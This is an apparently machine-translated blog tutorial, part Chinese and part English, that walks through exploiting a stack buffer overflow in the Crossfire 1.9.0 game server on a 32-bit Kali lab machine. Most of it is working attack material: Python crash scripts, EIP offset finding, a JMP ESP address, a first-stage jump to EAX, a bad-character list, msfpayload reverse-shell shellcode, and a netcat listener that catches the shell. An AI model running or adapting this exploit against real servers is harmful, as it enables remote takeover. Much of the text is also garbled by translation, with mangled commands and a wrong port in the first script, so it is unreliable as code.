The Linux system crosses the FireWire-buffer overflow
Principle: Crossfire 1.9. Version 0 There is a buffer overflow vulnerability when an inbound socket connection is accepted.
Tools:
Debugging Tools: EDB;
# # #python在漏洞溢出方面的渗透测试和漏洞攻击中, with a great advantage
Experimental object: Crossfire "multiplayer online RPG game"
Operating platform: Kali i686 Virtual Machine "32-bit, the number of computer CPUs refers to address bus bits, 64-bit system address space for 2^64, addressing too large, difficult to handle, in order to simplify this chapter operation, so choose 32-bit"
Building an experimental environment
#linux中, games need to be installed with their game folder
Server-side Programs
[Email protected]:~# cd \desktop[email protected]:~/desktop# lscrossfire.tar.gz[email protected]:~/desktop# MV Crossfire.tar.gz/usr/games[email protected]:~/desktop# Cd/usr/games/[email protected]:/usr/games# Lscrossfire.tar.gz[email protected]:/usr/games# tar zxpf crossfire.tar.gz[email protected]:/usr/games# ls-lhtotal 4.8mdrwxr-xr-x 8 root root 4.0K Feb crossfire-rwxrwx---1 root root 4.8M 05:16 Crossfire.tar.gz[email p rotected]:/usr/games# CD crossfire/[email protected]:/usr/games/crossfire# CD Bin/[email protected]:/usr/games/ crossfire/bin# lscrossedit crossfire-config crossloop.pl player_dl.plcrossfire crossloop
#若出现缺少什么组件, you can install the corresponding, as long as you see the waiting for connect, it is basically no problem
View port Open Status "13327"
[Email protected]:~# netstat-pantuactive Internet connections (servers and established) Proto recv-q send-q Local address< C0/>foreign Address State pid/program name TCP 0 0 0.0.0.0:13327 0.0.0.0:* LISTEN 4147/./crossfire UDP 0 0 0.0.0.0:68 0.0.0.0:* 629/dhclient
Debugging Tools
# # #也可用命令行来打开
New version of Linux kernel supports memory protection mechanism
DEP, ASLR, stack cookies, stack smash
Native debugging "Prevents unauthorized network access during penetration testing to prevent hackers from hacking into the computer"
Iptables-a input-p tcp--destination-port 13327 \! -D 127.0.0.1-j DROP #只有通过本机访问本地网卡的13327
Iptables-a input-p tcp--destination-port 4444 \! -D 127.0.0.1-j DROP #只有通过本机访问本地网卡4444
[Email protected]:~# iptables-a input-p tcp--destination-port 13327 \! -D 127.0.0.1-j drop[email protected]:~# iptables-a input-p tcp--destination-port 4444 \! -D 127.0.0.1-j drop[email protected]:~# iptables-lchain INPUT (policy ACCEPT) target prot opt source destination DROP TCP- anywhere !localhost tcp dpt:13327drop TCP- anywhere ! localhost tcp dpt:4444chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination
Debugging Tools
To start a service for debugging using the EDB debugging tool
EDB--run/usr/games/crossfire/bin/crossfire
#需要重复点击两个Debug->run
To view the register address such as EIP, double-click
01.py
#!/usr/bin/pythonimport sockethost = "127.0.0.1" crash = "\x41" * 4379 # # #crossfire必须在发送数值大小在一个固定数值的时候才能发生缓冲区溢出, Only when 4379 characters are sent can it be accurate to the overflow position # #buffer = "\x11 (Setup Sound" +crash+ "\x90\x90#)" s = Socket.socket (socket.af_inet,socket. SOCK_STREAM) print "[*]sending evil buffer ..." S.connect ((host,1327)) data = S.RECV (1024x768) print datas.send (buffer) S.close () print "[*]payload sent!"
EDB if a buffer overflow occurs, the next instruction cannot be carried out, there will be an alarm pop-up window
can confirm a buffer overflow vulnerability
#通过修改发送 the value of "A" to verify that the EIP register can be modified only if the number of characters is 4379
Unique string positioning the EIP position precisely
/USR/SHARE/METASPLOIT-‐FRAMEWORK/TOOLS/EXPLOIT/PATTERN_CREATE.RB 4379
Add a unique string to 02.py
Double-click Eip
Use./pattren_offset.rb to calculate offsets
Then four characters after 4368 are EIP addresses
Verify Location 03.py
View ESP Data section fellow in Dump
# # #因为ESP只能添7个字符才能精确修改EIP, so shellcode cannot be placed in the ESP register. So look for the rest of the registers
Find EAX and find it available
"Because the setup sound is a server directive, the first 12 characters must first send the setup sound"
There is a theory that directly adds 12 to the address of the EAX, which can be achieved by jumping, but it may not be possible to overflow after changing a machine, because the EAX address of different systems may not be the same
Idea: "The universality of consideration"
First stage Shellcode: Jump from ESP "7 bytes" to EAX, implement offset 12-bit characters in ESP
# # #一个5个字节, enough to plug in ESP, to jump to eax
\x83\xc0\x0c\xff\xe0\x90\x90 #\x90: Jump character to prevent filtering "the computer reads the data in the order contrary to the human reading order"
04.py
View ESP
#因为ESP的内存地址也不是固定的, so we need to find a fixed jump module in the system.
Addressing
Using the plugins in EDB opcode search
Using the first process 08048000, as long as the program is running, this process will always exist and can be used to find jmp ESP
# # #EIP->jmp esp->esp->eax
Find bad characters
###\x00\x0a\x0d\x20
Find each of the 256 encodings in the script
Set Breakpoints (0x08134597)
eip--08134597
Then the EIP jump address is
Crash = "\x41" * 4368 + "\x97\x45\x13\x08" "EIP" + "\x83\xc0\x0c\xff\xe0\x90\x90" "EAX"
04+.py
Set breakpoints
Run [F9]
Press F8 to perform the next step
Press F8 and jump into ESP register
Replace 4,368 characters with Shellcode, remaining bits continue to fill "A" "shellcode number of characters to be calculated"
Generate Shellcode Pose
[Email protected]:/usr/share/framework2#./msfpayload linux_ia32_reverse lhost=127.0.0.1 LPORT=4444 R |./msfencode-b " \x00\x0a\x0d\x20 "
Note: When generating shellcode, if the generated shellcode is incorrect, it can be resolved by rebooting
#!/usr/bin/pythonimport sockethost = "127.0.0.1" Shellcode = ("\xbb\x6d\x65\x9b\xcd\xdb\xdd\xd9\x74\x24\xf4\x5f\x2b\ Xc9 "+" \XB1\X14\X83\XC7\X04\X31\X5F\X10\X03\X5F\X10\X8F\X90\XAA "+" \x16\xb8\xb8\x9e\xeb\x15\x55\x23\x65\x78\x19\ X45\xb8\xfa "+" \x01\xd4\x10\x92\xb7\xe8\x85\x3e\xd2\xf8\xf4\xee\xab\x18 "+" \x9c\x68\xf4\x17\xe1\xfd\x45\xac\x51\ XF9\XF5\XCA\X58\X81 "+" \xb5\xa2\x05\x4c\xb9\x50\x90\x24\x85\x0e\xee\x38\xb0\xd7 "+" \x08\x50\x6c\x07\x9a\xc8\x1a\ x78\x3e\x61\xb5\x0f\x5d\x21 "+" \x1a\x99\x43\x71\x97\x54\x03 ") crash = Shellcode +" A "* (4368-105) +" \x97\x45\x13\x08 "+ "\x83\xc0\x0c\xff\xe0\x90\x90" buffer = "\x11 (Setup Sound" +crash+ "\x90\x90#)" s = Socket.socket (socket.af_inet,socket . SOCK_STREAM) print "[*]sending evil buffer ..." S.connect ((host,13327)) data = S.RECV (1024x768) print datas.send (buffer) S.close () print "[*]payload sent!"
#打开侦听4444端口 "Getshell when someone connects 4444."
NC 127.0.0.1 4444 # # #获得shell
Little white Diary, not to be continued ...
Small white diary 18:kali infiltration test buffer Overflow Instance (ii)--linux, through the FireWire 1.9.0